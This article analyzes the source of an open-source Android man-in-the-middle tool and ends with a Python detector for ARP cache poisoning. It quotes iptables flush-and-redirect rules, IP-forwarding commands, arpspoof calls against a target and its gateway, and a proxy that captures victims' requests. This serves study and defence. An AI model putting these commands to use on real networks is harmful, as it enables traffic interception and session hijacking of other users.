0x00
The idea of an Android man-in-the-middle attack is to hijack the conversation between an attacked machine and a server on a local area network. On the surface the attacked machine and the server appear to work normally, but their traffic has actually been hijacked by the man in the middle. The process can be shown in a single diagram.
The data sent by the attacked host first passes through the attacker. The data returned from the server also passes through the attacker before it is sent on to the attacked host.
0x01
An open-source Android man-in-the-middle attack sample is available at https://github.com/SSUN125/LANMITM. Here we mainly analyze the principle behind the session hijacking shown in the effect preview at that link.
Analyzing the https://github.com/SSUN125/LANMITM source code shows that its ARP spoofing involves four key steps:
1. NAT packet forwarding using iptables
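    public static final String[] PORT_REDIRECT_CMD = {
        "iptables -t nat -F",                                   // flush the nat table
        "iptables -F",                                          // flush the filter table
        "iptables -t nat -I POSTROUTING -s 0/0 -j MASQUERADE",  // source-NAT forwarded traffic
        "iptables -P FORWARD ACCEPT",                           // default-accept forwarded packets
        // <port>: the destination port value is missing from this copy of the listing
        "iptables -t nat -A PREROUTING -j DNAT -p tcp --dport <port> --to "
            + AppContext.getIP() + ":" + HttpProxy.HTTP_PROXY_PORT
    };

These commands are run in the startHttpProxy method of the ProxyService class.
2. Turn on IP forwarding so that the device agrees to forward packets like a router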
    private String[] FORWARD_COMMANDS = {
        "echo 1 > /proc/sys/net/ipv4/ip_forward",
        "echo 1 > /proc/sys/net/ipv6/conf/all/forwarding"
    };

This is called in the onStartCommand method of the ArpService class.
3. ARP poisoning
    // Poison the attacked host: tell it that the gateway's IP is at this device's MAC.
    if ((ONE_WAY_HOST & arp_cheat_way) != 0) {
        if (target_ip == null)
            target_ip = AppContext.getTarget().getIP();
        if (!target_ip.equals(AppContext.getGateway()))
            arp_spoof_cmd = getFilesDir() + "/arpspoof -i " + interfaceName
                    + " -t " + target_ip + " " + AppContext.getGateway();
        else
            arp_spoof_cmd = getFilesDir() + "/arpspoof -i " + interfaceName
                    + " -t " + AppContext.getGateway() + " " + target_ip;
        arpSpoof = new Thread() {
            @Override
            public void run() {
                ShellUtils.execCommand(arp_spoof_cmd, true, false);
            }
        };
        arpSpoof.start();
    }
    // Poison the return path: send spoofed ARP replies to the gateway.
    if ((ONE_WAY_ROUTE & arp_cheat_way) != 0) {
        arp_spoof_recv_cmd = getFilesDir() + "/arpspoof -i " + interfaceName
                + " -t " + AppContext.getGateway() + " " + AppContext.getIP();
        arpSpoofRecv = new Thread() {
            @Override
            public void run() {
                ShellUtils.execCommand(arp_spoof_recv_cmd, true, false);
            }
        };
        arpSpoofRecv.start();
    }

This is called in the onStartCommand method of the ArpService class.
4. On the attacker's machine, create a socket-based web server, similar in principle to implementing a simple web server with NanoHTTPD.
This lets the attacker obtain the requests of the attacked host and display them on the interface.
The core code is as follows:
    public class HttpProxy extends Thread {
        ...
        @Override
        public void run() {
            try {
                mServerSocket = new ServerSocket();
                mServerSocket.setReuseAddress(true);
                mServerSocket.bind(new InetSocketAddress(AppContext.getInetAddress(), HTTP_PROXY_PORT));
                executor = Executors.newCachedThreadPool();
                while (!stop) {
                    Socket client = mServerSocket.accept();
                    DealThread dealThread = null;
                    switch (mProxyMode) {
                    case MODE_PROXY_SIMPLE:
                        dealThread = new SimpleDealThread(client, mOnRequestListener);
                        break;
                    case MODE_PROXY_DEEP:
                        dealThread = new DeepDealThread(client, mOnRequestListener);
                        break;
                    }
                    executor.execute(dealThread);
                }
            } catch (IOException e) {
                e.printStackTrace();
            } finally {
                if (mServerSocket != null) {
                    try {
                        mServerSocket.close();
                    } catch (IOException e) {
                        e.printStackTrace();
                    }
                }
                if (executor != null) {
                    executor.shutdownNow();
                }
            }
        }
        ......
    }
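Seen from the attacked host, the ARP poisoning in step 3 leaves a trace: its ARP cache now maps the gateway's IP to the attacker's MAC address. The following is an added example (not part of the original article or of LANMITM) that parses /proc/net/arp-style text and flags that condition; the sample tables, addresses and function names are constructed for illustration.

```python
from collections import defaultdict

# Constructed sample ARP caches in /proc/net/arp format (not real captures).
CLEAN_TABLE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         aa:bb:cc:00:00:01     *        wlan0
192.168.1.42     0x1         0x2         de:ad:be:ef:00:42     *        wlan0
192.168.1.77     0x1         0x0         00:00:00:00:00:00     *        wlan0
"""
# Same host after poisoning: the gateway IP now resolves to 192.168.1.42's MAC.
POISONED_TABLE = """\
IP address       HW type     Flags       HW address            Mask     Device
192.168.1.1      0x1         0x2         DE:AD:BE:EF:00:42     *        wlan0
192.168.1.42     0x1         0x2         de:ad:be:ef:00:42     *        wlan0
"""

def parse_arp_table(text):
    """Return {ip: mac} for resolved entries of a /proc/net/arp-style table."""
    entries = {}
    for line in text.strip().splitlines()[1:]:        # skip the header row
        fields = line.split()
        if len(fields) < 6:
            continue
        ip, flags, mac = fields[0], int(fields[2], 16), fields[3].lower()
        if flags & 0x2 and mac != "00:00:00:00:00:00":  # 0x2 = entry is complete
            entries[ip] = mac
    return entries

def find_poisoning(entries, gateway_ip, pinned_gateway_mac=None):
    """Flag a gateway MAC that differs from a pinned value or is shared with another IP."""
    findings = []
    gw_mac = entries.get(gateway_ip)
    if gw_mac is None:
        return findings
    if pinned_gateway_mac and gw_mac != pinned_gateway_mac.lower():
        findings.append(("gateway-mac-changed", gateway_ip, gw_mac))
    by_mac = defaultdict(list)
    for ip, mac in entries.items():
        by_mac[mac].append(ip)
    shared = sorted(by_mac[gw_mac])
    if len(shared) > 1:   # can be legitimate (e.g. proxy ARP), so triage rather than block
        findings.append(("gateway-mac-shared", gw_mac, shared))
    return findings

if __name__ == "__main__":
    for name, table in (("clean", CLEAN_TABLE), ("poisoned", POISONED_TABLE)):
        print(name, find_poisoning(parse_arp_table(table), "192.168.1.1", "aa:bb:cc:00:00:01"))
```

Pinning the gateway MAC (a static ARP entry or a recorded baseline) gives the stronger signal; the shared-MAC check works without a baseline but only when the attacker's own IP is also present in the cache.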
Android man-in-the-middle attack